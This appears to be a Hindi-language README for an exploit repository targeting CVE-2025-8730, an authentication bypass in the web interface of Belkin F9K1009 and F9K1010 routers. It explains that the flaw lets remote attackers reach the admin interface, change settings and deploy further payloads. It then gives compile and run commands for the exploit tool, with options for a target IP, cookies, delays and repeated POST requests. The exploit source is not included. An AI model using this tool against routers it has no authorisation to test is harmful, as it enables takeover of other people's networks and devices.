
Belkin F9K1009 और F9K1010 राउटर्स के वेब इंटरफ़ेस में प्रमाणीकरण बायपास कमजोरी को प्रदर्शित करने वाला एक्सप्लॉइट।
लेखक : Byte Reaper
यह रिपॉजिटरी CVE-2025-8730 के लिए एक शोषण (exploit) प्रस्तुत करता है, जो बेल्किन F9K1009 और F9K1010 राउटर्स के वेब इंटरफेस को प्रभावित करने वाली एक गंभीर प्रमाणीकरण बाईपास भेद्यता है।
यह दोष /login.htm फ़ाइल की सत्र सत्यापन तर्क में है, जहां अनुचित तरीके से संभाले गए कुकीज़ या निर्मित अनुरोध हमलावरों को लॉगिन जांच को बाईपास करने और बिना वैध क्रेडेंशियल्स के प्रशासनिक इंटरफेस तक पूर्ण पहुंच प्राप्त करने की अनुमति देते हैं।
यह भेद्यता दूरस्थ हमलावरों (नेटवर्क पहुंच के साथ) को सक्षम बनाती है:
संवेदनशील कॉन्फ़िगरेशन डेटा तक पहुंच
राउटर सेटिंग्स को संशोधित करें
स्थिरता या पार्श्व संचलन के लिए आगे के पेलोड तैनात करें
NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
लाइसेंस :
MIT लाइसेंस